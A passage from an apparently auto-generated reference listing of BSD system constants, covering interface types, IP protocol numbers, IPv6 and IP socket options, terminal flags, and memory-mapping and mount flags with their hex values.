(line 574) | IFT_ISDNS = 0x4b constant IFT_ISDNU (line 575) | IFT_ISDNU = 0x4c constant IFT_ISO88022LLC (line 576) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 577) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 578) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 579) | IFT_ISO88025 = 0x9 constant IFT_ISO88025CRFPINT (line 580) | IFT_ISO88025CRFPINT = 0x62 constant IFT_ISO88025DTR (line 581) | IFT_ISO88025DTR = 0x56 constant IFT_ISO88025FIBER (line 582) | IFT_ISO88025FIBER = 0x73 constant IFT_ISO88026 (line 583) | IFT_ISO88026 = 0xa constant IFT_ISUP (line 584) | IFT_ISUP = 0xb3 constant IFT_L2VLAN (line 585) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 586) | IFT_L3IPVLAN = 0x88 constant IFT_L3IPXVLAN (line 587) | IFT_L3IPXVLAN = 0x89 constant IFT_LAPB (line 588) | IFT_LAPB = 0x10 constant IFT_LAPD (line 589) | IFT_LAPD = 0x4d constant IFT_LAPF (line 590) | IFT_LAPF = 0x77 constant IFT_LOCALTALK (line 591) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 592) | IFT_LOOP = 0x18 constant IFT_MEDIAMAILOVERIP (line 593) | IFT_MEDIAMAILOVERIP = 0x8b constant IFT_MFSIGLINK (line 594) | IFT_MFSIGLINK = 0xa7 constant IFT_MIOX25 (line 595) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 596) | IFT_MODEM = 0x30 constant IFT_MPC (line 597) | IFT_MPC = 0x71 constant IFT_MPLS (line 598) | IFT_MPLS = 0xa6 constant IFT_MPLSTUNNEL (line 599) | IFT_MPLSTUNNEL = 0x96 constant IFT_MSDSL (line 600) | IFT_MSDSL = 0x8f constant IFT_MVL (line 601) | IFT_MVL = 0xbf constant IFT_MYRINET (line 602) | IFT_MYRINET = 0x63 constant IFT_NFAS (line 603) | IFT_NFAS = 0xaf constant IFT_NSIP (line 604) | IFT_NSIP = 0x1b constant IFT_OPTICALCHANNEL (line 605) | IFT_OPTICALCHANNEL = 0xc3 constant IFT_OPTICALTRANSPORT (line 606) | IFT_OPTICALTRANSPORT = 0xc4 constant IFT_OTHER (line 607) | IFT_OTHER = 0x1 constant IFT_P10 (line 608) | IFT_P10 = 0xc constant IFT_P80 (line 609) | IFT_P80 = 0xd constant IFT_PARA (line 610) | IFT_PARA = 0x22 constant IFT_PFLOG (line 611) | IFT_PFLOG = 0xf5 constant IFT_PFSYNC (line 612) | IFT_PFSYNC = 0xf6 constant IFT_PLC (line 613) | IFT_PLC = 0xae constant IFT_POS (line 614) | IFT_POS = 0xab constant IFT_PPP (line 615) | IFT_PPP = 0x17 constant IFT_PPPMULTILINKBUNDLE (line 616) | IFT_PPPMULTILINKBUNDLE = 0x6c constant IFT_PROPBWAP2MP (line 617) | IFT_PROPBWAP2MP = 0xb8 constant IFT_PROPCNLS (line 618) | IFT_PROPCNLS = 0x59 constant IFT_PROPDOCSWIRELESSDOWNSTREAM (line 619) | IFT_PROPDOCSWIRELESSDOWNSTREAM = 0xb5 constant IFT_PROPDOCSWIRELESSMACLAYER (line 620) | IFT_PROPDOCSWIRELESSMACLAYER = 0xb4 constant IFT_PROPDOCSWIRELESSUPSTREAM (line 621) | IFT_PROPDOCSWIRELESSUPSTREAM = 0xb6 constant IFT_PROPMUX (line 622) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 623) | IFT_PROPVIRTUAL = 0x35 constant IFT_PROPWIRELESSP2P (line 624) | IFT_PROPWIRELESSP2P = 0x9d constant IFT_PTPSERIAL (line 625) | IFT_PTPSERIAL = 0x16 constant IFT_PVC (line 626) | IFT_PVC = 0xf1 constant IFT_QLLC (line 627) | IFT_QLLC = 0x44 constant IFT_RADIOMAC (line 628) | IFT_RADIOMAC = 0xbc constant IFT_RADSL (line 629) | IFT_RADSL = 0x5f constant IFT_REACHDSL (line 630) | IFT_REACHDSL = 0xc0 constant IFT_RFC1483 (line 631) | IFT_RFC1483 = 0x9f constant IFT_RS232 (line 632) | IFT_RS232 = 0x21 constant IFT_RSRB (line 633) | IFT_RSRB = 0x4f constant IFT_SDLC (line 634) | IFT_SDLC = 0x11 constant IFT_SDSL (line 635) | IFT_SDSL = 0x60 constant IFT_SHDSL (line 636) | IFT_SHDSL = 0xa9 constant IFT_SIP (line 637) | IFT_SIP = 0x1f constant IFT_SLIP (line 638) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 639) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 640) | IFT_SMDSICIP = 0x34 constant IFT_SONET (line 641) | IFT_SONET = 0x27 constant IFT_SONETOVERHEADCHANNEL (line 642) | IFT_SONETOVERHEADCHANNEL = 0xb9 constant IFT_SONETPATH (line 643) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 644) | IFT_SONETVT = 0x33 constant IFT_SRP (line 645) | IFT_SRP = 0x97 constant IFT_SS7SIGLINK (line 646) | IFT_SS7SIGLINK = 0x9c constant IFT_STACKTOSTACK (line 647) | IFT_STACKTOSTACK = 0x6f constant IFT_STARLAN (line 648) | IFT_STARLAN = 0xb constant IFT_STF (line 649) | IFT_STF = 0xf3 constant IFT_T1 (line 650) | IFT_T1 = 0x12 constant IFT_TDLC (line 651) | IFT_TDLC = 0x74 constant IFT_TERMPAD (line 652) | IFT_TERMPAD = 0x5b constant IFT_TR008 (line 653) | IFT_TR008 = 0xb0 constant IFT_TRANSPHDLC (line 654) | IFT_TRANSPHDLC = 0x7b constant IFT_TUNNEL (line 655) | IFT_TUNNEL = 0x83 constant IFT_ULTRA (line 656) | IFT_ULTRA = 0x1d constant IFT_USB (line 657) | IFT_USB = 0xa0 constant IFT_V11 (line 658) | IFT_V11 = 0x40 constant IFT_V35 (line 659) | IFT_V35 = 0x2d constant IFT_V36 (line 660) | IFT_V36 = 0x41 constant IFT_V37 (line 661) | IFT_V37 = 0x78 constant IFT_VDSL (line 662) | IFT_VDSL = 0x61 constant IFT_VIRTUALIPADDRESS (line 663) | IFT_VIRTUALIPADDRESS = 0x70 constant IFT_VOICEEM (line 664) | IFT_VOICEEM = 0x64 constant IFT_VOICEENCAP (line 665) | IFT_VOICEENCAP = 0x67 constant IFT_VOICEFXO (line 666) | IFT_VOICEFXO = 0x65 constant IFT_VOICEFXS (line 667) | IFT_VOICEFXS = 0x66 constant IFT_VOICEOVERATM (line 668) | IFT_VOICEOVERATM = 0x98 constant IFT_VOICEOVERFRAMERELAY (line 669) | IFT_VOICEOVERFRAMERELAY = 0x99 constant IFT_VOICEOVERIP (line 670) | IFT_VOICEOVERIP = 0x68 constant IFT_X213 (line 671) | IFT_X213 = 0x5d constant IFT_X25 (line 672) | IFT_X25 = 0x5 constant IFT_X25DDN (line 673) | IFT_X25DDN = 0x4 constant IFT_X25HUNTGROUP (line 674) | IFT_X25HUNTGROUP = 0x7a constant IFT_X25MLP (line 675) | IFT_X25MLP = 0x79 constant IFT_X25PLE (line 676) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 677) | IFT_XETHER = 0x1a constant IGNBRK (line 678) | IGNBRK = 0x1 constant IGNCR (line 679) | IGNCR = 0x80 constant IGNPAR (line 680) | IGNPAR = 0x4 constant IMAXBEL (line 681) | IMAXBEL = 0x2000 constant INLCR (line 682) | INLCR = 0x40 constant INPCK (line 683) | INPCK = 0x10 constant IN_CLASSA_HOST (line 684) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 685) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 686) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 687) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 688) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 689) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 690) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 691) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 692) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 693) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 694) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 695) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 696) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 697) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 698) | IN_LOOPBACKNET = 0x7f constant IN_RFC3021_MASK (line 699) | IN_RFC3021_MASK = 0xfffffffe constant IPPROTO_3PC (line 700) | IPPROTO_3PC = 0x22 constant IPPROTO_ADFS (line 701) | IPPROTO_ADFS = 0x44 constant IPPROTO_AH (line 702) | IPPROTO_AH = 0x33 constant IPPROTO_AHIP (line 703) | IPPROTO_AHIP = 0x3d constant IPPROTO_APES (line 704) | IPPROTO_APES = 0x63 constant IPPROTO_ARGUS (line 705) | IPPROTO_ARGUS = 0xd constant IPPROTO_AX25 (line 706) | IPPROTO_AX25 = 0x5d constant IPPROTO_BHA (line 707) | IPPROTO_BHA = 0x31 constant IPPROTO_BLT (line 708) | IPPROTO_BLT = 0x1e constant IPPROTO_BRSATMON (line 709) | IPPROTO_BRSATMON = 0x4c constant IPPROTO_CARP (line 710) | IPPROTO_CARP = 0x70 constant IPPROTO_CFTP (line 711) | IPPROTO_CFTP = 0x3e constant IPPROTO_CHAOS (line 712) | IPPROTO_CHAOS = 0x10 constant IPPROTO_CMTP (line 713) | IPPROTO_CMTP = 0x26 constant IPPROTO_CPHB (line 714) | IPPROTO_CPHB = 0x49 constant IPPROTO_CPNX (line 715) | IPPROTO_CPNX = 0x48 constant IPPROTO_DDP (line 716) | IPPROTO_DDP = 0x25 constant IPPROTO_DGP (line 717) | IPPROTO_DGP = 0x56 constant IPPROTO_DIVERT (line 718) | IPPROTO_DIVERT = 0xfe constant IPPROTO_DONE (line 719) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 720) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 721) | IPPROTO_EGP = 0x8 constant IPPROTO_EMCON (line 722) | IPPROTO_EMCON = 0xe constant IPPROTO_ENCAP (line 723) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 724) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 725) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 726) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 727) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 728) | IPPROTO_GGP = 0x3 constant IPPROTO_GMTP (line 729) | IPPROTO_GMTP = 0x64 constant IPPROTO_GRE (line 730) | IPPROTO_GRE = 0x2f constant IPPROTO_HELLO (line 731) | IPPROTO_HELLO = 0x3f constant IPPROTO_HMP (line 732) | IPPROTO_HMP = 0x14 constant IPPROTO_HOPOPTS (line 733) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 734) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 735) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 736) | IPPROTO_IDP = 0x16 constant IPPROTO_IDPR (line 737) | IPPROTO_IDPR = 0x23 constant IPPROTO_IDRP (line 738) | IPPROTO_IDRP = 0x2d constant IPPROTO_IGMP (line 739) | IPPROTO_IGMP = 0x2 constant IPPROTO_IGP (line 740) | IPPROTO_IGP = 0x55 constant IPPROTO_IGRP (line 741) | IPPROTO_IGRP = 0x58 constant IPPROTO_IL (line 742) | IPPROTO_IL = 0x28 constant IPPROTO_INLSP (line 743) | IPPROTO_INLSP = 0x34 constant IPPROTO_INP (line 744) | IPPROTO_INP = 0x20 constant IPPROTO_IP (line 745) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 746) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPCV (line 747) | IPPROTO_IPCV = 0x47 constant IPPROTO_IPEIP (line 748) | IPPROTO_IPEIP = 0x5e constant IPPROTO_IPIP (line 749) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPPC (line 750) | IPPROTO_IPPC = 0x43 constant IPPROTO_IPV4 (line 751) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 752) | IPPROTO_IPV6 = 0x29 constant IPPROTO_IRTP (line 753) | IPPROTO_IRTP = 0x1c constant IPPROTO_KRYPTOLAN (line 754) | IPPROTO_KRYPTOLAN = 0x41 constant IPPROTO_LARP (line 755) | IPPROTO_LARP = 0x5b constant IPPROTO_LEAF1 (line 756) | IPPROTO_LEAF1 = 0x19 constant IPPROTO_LEAF2 (line 757) | IPPROTO_LEAF2 = 0x1a constant IPPROTO_MAX (line 758) | IPPROTO_MAX = 0x100 constant IPPROTO_MAXID (line 759) | IPPROTO_MAXID = 0x34 constant IPPROTO_MEAS (line 760) | IPPROTO_MEAS = 0x13 constant IPPROTO_MHRP (line 761) | IPPROTO_MHRP = 0x30 constant IPPROTO_MICP (line 762) | IPPROTO_MICP = 0x5f constant IPPROTO_MOBILE (line 763) | IPPROTO_MOBILE = 0x37 constant IPPROTO_MTP (line 764) | IPPROTO_MTP = 0x5c constant IPPROTO_MUX (line 765) | IPPROTO_MUX = 0x12 constant IPPROTO_ND (line 766) | IPPROTO_ND = 0x4d constant IPPROTO_NHRP (line 767) | IPPROTO_NHRP = 0x36 constant IPPROTO_NONE (line 768) | IPPROTO_NONE = 0x3b constant IPPROTO_NSP (line 769) | IPPROTO_NSP = 0x1f constant IPPROTO_NVPII (line 770) | IPPROTO_NVPII = 0xb constant IPPROTO_OSPFIGP (line 771) | IPPROTO_OSPFIGP = 0x59 constant IPPROTO_PFSYNC (line 772) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PGM (line 773) | IPPROTO_PGM = 0x71 constant IPPROTO_PIGP (line 774) | IPPROTO_PIGP = 0x9 constant IPPROTO_PIM (line 775) | IPPROTO_PIM = 0x67 constant IPPROTO_PRM (line 776) | IPPROTO_PRM = 0x15 constant IPPROTO_PUP (line 777) | IPPROTO_PUP = 0xc constant IPPROTO_PVP (line 778) | IPPROTO_PVP = 0x4b constant IPPROTO_RAW (line 779) | IPPROTO_RAW = 0xff constant IPPROTO_RCCMON (line 780) | IPPROTO_RCCMON = 0xa constant IPPROTO_RDP (line 781) | IPPROTO_RDP = 0x1b constant IPPROTO_ROUTING (line 782) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 783) | IPPROTO_RSVP = 0x2e constant IPPROTO_RVD (line 784) | IPPROTO_RVD = 0x42 constant IPPROTO_SATEXPAK (line 785) | IPPROTO_SATEXPAK = 0x40 constant IPPROTO_SATMON (line 786) | IPPROTO_SATMON = 0x45 constant IPPROTO_SCCSP (line 787) | IPPROTO_SCCSP = 0x60 constant IPPROTO_SDRP (line 788) | IPPROTO_SDRP = 0x2a constant IPPROTO_SEP (line 789) | IPPROTO_SEP = 0x21 constant IPPROTO_SKIP (line 790) | IPPROTO_SKIP = 0x39 constant IPPROTO_SRPC (line 791) | IPPROTO_SRPC = 0x5a constant IPPROTO_ST (line 792) | IPPROTO_ST = 0x7 constant IPPROTO_SVMTP (line 793) | IPPROTO_SVMTP = 0x52 constant IPPROTO_SWIPE (line 794) | IPPROTO_SWIPE = 0x35 constant IPPROTO_TCF (line 795) | IPPROTO_TCF = 0x57 constant IPPROTO_TCP (line 796) | IPPROTO_TCP = 0x6 constant IPPROTO_TLSP (line 797) | IPPROTO_TLSP = 0x38 constant IPPROTO_TP (line 798) | IPPROTO_TP = 0x1d constant IPPROTO_TPXX (line 799) | IPPROTO_TPXX = 0x27 constant IPPROTO_TRUNK1 (line 800) | IPPROTO_TRUNK1 = 0x17 constant IPPROTO_TRUNK2 (line 801) | IPPROTO_TRUNK2 = 0x18 constant IPPROTO_TTP (line 802) | IPPROTO_TTP = 0x54 constant IPPROTO_UDP (line 803) | IPPROTO_UDP = 0x11 constant IPPROTO_UNKNOWN (line 804) | IPPROTO_UNKNOWN = 0x102 constant IPPROTO_VINES (line 805) | IPPROTO_VINES = 0x53 constant IPPROTO_VISA (line 806) | IPPROTO_VISA = 0x46 constant IPPROTO_VMTP (line 807) | IPPROTO_VMTP = 0x51 constant IPPROTO_WBEXPAK (line 808) | IPPROTO_WBEXPAK = 0x4f constant IPPROTO_WBMON (line 809) | IPPROTO_WBMON = 0x4e constant IPPROTO_WSN (line 810) | IPPROTO_WSN = 0x4a constant IPPROTO_XNET (line 811) | IPPROTO_XNET = 0xf constant IPPROTO_XTP (line 812) | IPPROTO_XTP = 0x24 constant IPV6_AUTOFLOWLABEL (line 813) | IPV6_AUTOFLOWLABEL = 0x3b constant IPV6_BINDV6ONLY (line 814) | IPV6_BINDV6ONLY = 0x1b constant IPV6_CHECKSUM (line 815) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 816) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 817) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 818) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 819) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 820) | IPV6_DSTOPTS = 0x32 constant IPV6_FLOWINFO_MASK (line 821) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_MASK (line 822) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FRAGTTL (line 823) | IPV6_FRAGTTL = 0x78 constant IPV6_FW_ADD (line 824) | IPV6_FW_ADD = 0x1e constant IPV6_FW_DEL (line 825) | IPV6_FW_DEL = 0x1f constant IPV6_FW_FLUSH (line 826) | IPV6_FW_FLUSH = 0x20 constant IPV6_FW_GET (line 827) | IPV6_FW_GET = 0x22 constant IPV6_FW_ZERO (line 828) | IPV6_FW_ZERO = 0x21 constant IPV6_HLIMDEC (line 829) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 830) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 831) | IPV6_HOPOPTS = 0x31 constant IPV6_JOIN_GROUP (line 832) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 833) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 834) | IPV6_MAXHLIM = 0xff constant IPV6_MAXPACKET (line 835) | IPV6_MAXPACKET = 0xffff constant IPV6_MINHLIM (line 836) | IPV6_MINHLIM = 0x28 constant IPV6_MMTU (line 837) | IPV6_MMTU = 0x500 constant IPV6_MSFILTER (line 838) | IPV6_MSFILTER = 0x4a constant IPV6_MULTICAST_HOPS (line 839) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 840) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 841) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 842) | IPV6_NEXTHOP = 0x30 constant IPV6_PATHMTU (line 843) | IPV6_PATHMTU = 0x2c constant IPV6_PKTINFO (line 844) | IPV6_PKTINFO = 0x2e constant IPV6_PKTOPTIONS (line 845) | IPV6_PKTOPTIONS = 0x34 constant IPV6_PORTRANGE (line 846) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 847) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 848) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 849) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_PREFER_TEMPADDR (line 850) | IPV6_PREFER_TEMPADDR = 0x3f constant IPV6_RECVDSTOPTS (line 851) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVHOPLIMIT (line 852) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 853) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVPATHMTU (line 854) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 855) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRTHDR (line 856) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 857) | IPV6_RECVTCLASS = 0x39 constant IPV6_RTHDR (line 858) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 859) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 860) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 861) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 862) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 863) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 864) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 865) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 866) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 867) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 868) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 869) | IPV6_VERSION_MASK = 0xf0 constant IP_ADD_MEMBERSHIP (line 870) | IP_ADD_MEMBERSHIP = 0xc constant IP_DEFAULT_MULTICAST_LOOP (line 871) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 872) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 873) | IP_DF = 0x4000 constant IP_DROP_MEMBERSHIP (line 874) | IP_DROP_MEMBERSHIP = 0xd constant IP_DUMMYNET_CONFIGURE (line 875) | IP_DUMMYNET_CONFIGURE = 0x3c constant IP_DUMMYNET_DEL (line 876) | IP_DUMMYNET_DEL = 0x3d constant IP_DUMMYNET_FLUSH (line 877) | IP_DUMMYNET_FLUSH = 0x3e constant IP_DUMMYNET_GET (line 878) | IP_DUMMYNET_GET = 0x40 constant IP_FW_ADD (line 879) | IP_FW_ADD = 0x32 constant IP_FW_DEL (line 880) | IP_FW_DEL = 0x33 constant IP_FW_FLUSH (line 881) | IP_FW_FLUSH = 0x34 constant IP_FW_GET (line 882) | IP_FW_GET = 0x36 constant IP_FW_RESETLOG (line 883) | IP_FW_RESETLOG = 0x37 constant IP_FW_TBL_ADD (line 884) | IP_FW_TBL_ADD = 0x2a constant IP_FW_TBL_CREATE (line 885) | IP_FW_TBL_CREATE = 0x28 constant IP_FW_TBL_DEL (line 886) | IP_FW_TBL_DEL = 0x2b constant IP_FW_TBL_DESTROY (line 887) | IP_FW_TBL_DESTROY = 0x29 constant IP_FW_TBL_EXPIRE (line 888) | IP_FW_TBL_EXPIRE = 0x2f constant IP_FW_TBL_FLUSH (line 889) | IP_FW_TBL_FLUSH = 0x2c constant IP_FW_TBL_GET (line 890) | IP_FW_TBL_GET = 0x2d constant IP_FW_TBL_ZERO (line 891) | IP_FW_TBL_ZERO = 0x2e constant IP_FW_X (line 892) | IP_FW_X = 0x31 constant IP_FW_ZERO (line 893) | IP_FW_ZERO = 0x35 constant IP_HDRINCL (line 894) | IP_HDRINCL = 0x2 constant IP_MAXPACKET (line 895) | IP_MAXPACKET = 0xffff constant IP_MAX_MEMBERSHIPS (line 896) | IP_MAX_MEMBERSHIPS = 0x14 constant IP_MF (line 897) | IP_MF = 0x2000 constant IP_MINTTL (line 898) | IP_MINTTL = 0x42 constant IP_MSS (line 899) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 900) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 901) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 902) | IP_MULTICAST_TTL = 0xa constant IP_MULTICAST_VIF (line 903) | IP_MULTICAST_VIF = 0xe constant IP_OFFMASK (line 904) | IP_OFFMASK = 0x1fff constant IP_OPTIONS (line 905) | IP_OPTIONS = 0x1 constant IP_PORTRANGE (line 906) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 907) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 908) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 909) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 910) | IP_RECVDSTADDR = 0x7 constant IP_RECVIF (line 911) | IP_RECVIF = 0x14 constant IP_RECVOPTS (line 912) | IP_RECVOPTS = 0x5 constant IP_RECVRETOPTS (line 913) | IP_RECVRETOPTS = 0x6 constant IP_RECVTTL (line 914) | IP_RECVTTL = 0x41 constant IP_RETOPTS (line 915) | IP_RETOPTS = 0x8 constant IP_RF (line 916) | IP_RF = 0x8000 constant IP_RSVP_OFF (line 917) | IP_RSVP_OFF = 0x10 constant IP_RSVP_ON (line 918) | IP_RSVP_ON = 0xf constant IP_RSVP_VIF_OFF (line 919) | IP_RSVP_VIF_OFF = 0x12 constant IP_RSVP_VIF_ON (line 920) | IP_RSVP_VIF_ON = 0x11 constant IP_TOS (line 921) | IP_TOS = 0x3 constant IP_TTL (line 922) | IP_TTL = 0x4 constant ISIG (line 923) | ISIG = 0x80 constant ISTRIP (line 924) | ISTRIP = 0x20 constant IXANY (line 925) | IXANY = 0x800 constant IXOFF (line 926) | IXOFF = 0x400 constant IXON (line 927) | IXON = 0x200 constant KERN_HOSTNAME (line 928) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 929) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 930) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 931) | KERN_VERSION = 0x4 constant LOCK_EX (line 932) | LOCK_EX = 0x2 constant LOCK_NB (line 933) | LOCK_NB = 0x4 constant LOCK_SH (line 934) | LOCK_SH = 0x1 constant LOCK_UN (line 935) | LOCK_UN = 0x8 constant MADV_AUTOSYNC (line 936) | MADV_AUTOSYNC = 0x7 constant MADV_CONTROL_END (line 937) | MADV_CONTROL_END = 0xb constant MADV_CONTROL_START (line 938) | MADV_CONTROL_START = 0xa constant MADV_CORE (line 939) | MADV_CORE = 0x9 constant MADV_DONTNEED (line 940) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 941) | MADV_FREE = 0x5 constant MADV_INVAL (line 942) | MADV_INVAL = 0xa constant MADV_NOCORE (line 943) | MADV_NOCORE = 0x8 constant MADV_NORMAL (line 944) | MADV_NORMAL = 0x0 constant MADV_NOSYNC (line 945) | MADV_NOSYNC = 0x6 constant MADV_RANDOM (line 946) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 947) | MADV_SEQUENTIAL = 0x2 constant MADV_SETMAP (line 948) | MADV_SETMAP = 0xb constant MADV_WILLNEED (line 949) | MADV_WILLNEED = 0x3 constant MAP_ANON (line 950) | MAP_ANON = 0x1000 constant MAP_ANONYMOUS (line 951) | MAP_ANONYMOUS = 0x1000 constant MAP_COPY (line 952) | MAP_COPY = 0x2 constant MAP_FILE (line 953) | MAP_FILE = 0x0 constant MAP_FIXED (line 954) | MAP_FIXED = 0x10 constant MAP_HASSEMAPHORE (line 955) | MAP_HASSEMAPHORE = 0x200 constant MAP_INHERIT (line 956) | MAP_INHERIT = 0x80 constant MAP_NOCORE (line 957) | MAP_NOCORE = 0x20000 constant MAP_NOEXTEND (line 958) | MAP_NOEXTEND = 0x100 constant MAP_NORESERVE (line 959) | MAP_NORESERVE = 0x40 constant MAP_NOSYNC (line 960) | MAP_NOSYNC = 0x800 constant MAP_PRIVATE (line 961) | MAP_PRIVATE = 0x2 constant MAP_RENAME (line 962) | MAP_RENAME = 0x20 constant MAP_SHARED (line 963) | MAP_SHARED = 0x1 constant MAP_SIZEALIGN (line 964) | MAP_SIZEALIGN = 0x40000 constant MAP_STACK (line 965) | MAP_STACK = 0x400 constant MAP_TRYFIXED (line 966) | MAP_TRYFIXED = 0x10000 constant MAP_VPAGETABLE (line 967) | MAP_VPAGETABLE = 0x2000 constant MCL_CURRENT (line 968) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 969) | MCL_FUTURE = 0x2 constant MNT_ASYNC (line 970) | MNT_ASYNC = 0x40 constant MNT_AUTOMOUNTED (line 971) | MNT_AUTOMOUNTED = 0x20 constant MNT_CMDFLAGS (line 972) | MNT_CMDFLAGS = 0xf0000 constant MNT_DEFEXPORTED (line 973) | MNT_DEFEXPORTED = 0x200 constant MNT_DELEXPORT (line 974) | MNT_DELEXPORT = 0x20000 constant MNT_EXKERB (line 975) | MNT_EXKERB = 0x800 constant MNT_EXPORTANON (line 976) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 977) | MNT_EXPORTED = 0x100 constant MNT_EXPUBLIC (line 978) | MNT_EXPUBLIC = 0x20000000 constant MNT_EXRDONLY (line 979) | MNT_EXRDONLY = 0x80 constant MNT_FORCE (line 980) | MNT_FORCE = 0x80000 constant MNT_IGNORE (line 981) | MNT_IGNORE = 0x800000 constant MNT_LAZY (line 982) | MNT_LAZY = 0x4 constant MNT_LOCAL (line 983) | MNT_LOCAL = 0x1000 constant MNT_NOATIME (line 984) | MNT_NOATIME = 0x10000000 constant MNT_NOCLUSTERR (line 985) | MNT_NOCLUSTERR = 0x40000000 constant MNT_NOCLUSTERW (line 986) | MNT_NOCLUSTERW = 0x80000000 constant MNT_NODEV (line 987) | MNT_NODEV = 0x10 constant MNT_NOEXEC 